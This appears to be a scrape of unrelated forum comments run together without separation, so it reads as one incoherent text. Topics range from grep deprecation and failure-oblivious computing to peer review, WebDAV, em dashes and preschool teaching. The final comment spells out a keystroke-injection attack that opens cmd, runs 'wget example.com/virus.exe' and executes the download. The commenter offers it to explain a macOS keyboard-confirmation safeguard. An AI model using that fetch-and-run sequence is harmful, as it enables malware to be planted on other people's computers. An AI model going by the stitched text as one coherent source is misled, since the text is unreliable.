"GNU grep added a warning to inform you of the deprecation which happened 28 years ago, but only to stderr, and still works like you expect", does to me.
> Failure-oblivious computing "enables servers to execute through memory errors without memory corruption. Our safe compiler for C inserts checks that dynamically detect invalid memory
accesses. Instead of terminating or throwing an exception, the generated code simply discards invalid writes and manufactures values to return for invalid reads, enabling the server to continue its normal execution path.
From the conclusion:
> Our results show that failure-oblivious computation enhances availability, resilience, and security by continuing to execute through memory errors while ensuring that such errors do not corrupt the address space or data structures of the computation. In many cases failure-oblivious
computing can automatically convert unanticipated and dangerous inputs or data into anticipated error cases that the program is designed to handle correctly. The result is that the program survives the unanticipated situation, returns back into its normal operating envelope, and continues to satisfy the needs of its users.
>Come back in 5 years time when the batteries are 10 years old and failing like the bridges and schools and universities.
This however is a valid point to make. In my experience with battery systems, regular maintenance and replacing failed units is one of the things that people are quick to not do on preventative schedule. Instead, they wait until the unit is completely dead and then gasp at the cost of battery replacement. Based on how companies like PG&E not do regular maintenance on their lines, it doesn't bode well for the batteries.
1 - Very few people conduct "proper scholarship", and fail to trace ideas back to their original inception and cite them correctly. This happens time and again in deep learning, where 30+ year old ideas are claimed as "novel" over and over. Many times out of malice by the authors, sometimes out of ignorance.
2 - Peer review in many parts of the industry+research is a joke. Mostly shouldered by early graduate students who don't really know the field well and an incredibly noisy process.
3 - It is common practice now to dump out one's "kitchen sink" of ideas rather than properly refined stuff. Hence the increase in LinkedIn spam, blog spam, arXiv spam style of papers.
Metalang99 is a firm foundation for writing reliable and maintainable metaprograms in pure C99. It is implemented as an interpreted FP language atop of preprocessor macros: just #include <metalang99.h> and you are ready to go. Metalang99 features algebraic data types, pattern matching, recursion, currying, and collections; in addition, it provides means for compile-time error reporting and debugging. With our built-in syntax checker, macro errors should be perfectly comprehensible, enabling you for convenient development.
OP here. Appreciate the feedback - the login barrier is definitely something we will take on board. I think some level of identity authentication is a must to counter the scourge of bot traffic, but we will think of ways to be cleverer about this.
With regard to job posting accuracy - absolutely this is a problem. Normalising what different job descriptions actually _mean_ is one of the key challenges we want to solve.
Unlike what the title of the post implies, I would say Wikipedia bears 0% of the blame for this issue.
I would put 50% of the blame on goggle, for offering up translations that are wholly or partially in error, without any indication such as a warning message to that effect.
Then I would assign 40% of the blame on LLM text generation based on models where the model creators performed no review of their training data.
The final 10% of blame goes to anyone who would post rubbish without first hand knowledge that at least the translation was correct.
Except for that final 10%, all of the blame goes to the profit motive. Foisting shit on the world for the sole purpose of profit.
And lets face it, this isn't exactly the first time marginalized people, or their languages, have suffered because of western capitalism...
p.s. fan-bois kool-aid drinkers, feel free to start your down-voting now...
The constant A/B tests in Google apps like the Play Store drives me nuts. Buttons constantly changing around which is equal to being gaslit because you are wondering whether you just misremembered where the button was.
> In fact, you're already using WebDAV and you just don't realize it.
Tailscale's drive share feature is implemented as a WebDAV share (connect to http://100.100.100.100:8080). You can also connect to Fastmail's file storage over WebDAV.
If you are leaving a comment it’s because someone didn’t learn how things should be from the tools in your codebase.
Naming style problem? Linting isn’t catching it.
Architecture violation? Your import linting isn’t catching it.
Duplication of a method that exists elsewhere? What tooling can you create in the LLM era - remembering you can ask agents to build scripts now - which can catch this for you the moment the PR goes up?
That’s a lot of confidence with a vanishingly small amount of evidence. I am constantly accused of being an AI for articles I blogged more than 20 years ago.
I use—still—em dashes whenever I feel like they are better than commas, parentheses or semicolons.
Because that’s what they are for, and this is English after all. Some people don’t approve, and I approve of their disapproval—it’s a free country and writing is a creative process.
What doesn’t contribute are comments that discredit and disparage without adding anything to the conversation.
I doubt that you need any of that or it has any use for dealing with kids ages 3-6. Every granny and auntie knew how to do it since time immemorial. Just let them play, go out in the yard, chase the ants, dig some holes in the mud, run around, play with a ball. Eat and take a nap, look at picture books, have the teacher tell a story while the kids sit around her etc.
What matters is to have low-stress, motivated teachers with good personalities, empathy and intelligence. And similarly a filtered peer group. All the rest is window dressing.
Of course it can. You can send keystrokes something like <Win>+R, cmd, wget example.com/virus.exe <Enter> virus.exe <Enter> and Windows computer will download and execute this binary. That's example for Windows, but there's nothing preventing you from using similar technique for macOS.
The only security barrier that macOS implements against this kind of attack is, that you must manually confirm after you connected that "keyboard", for system to enable it.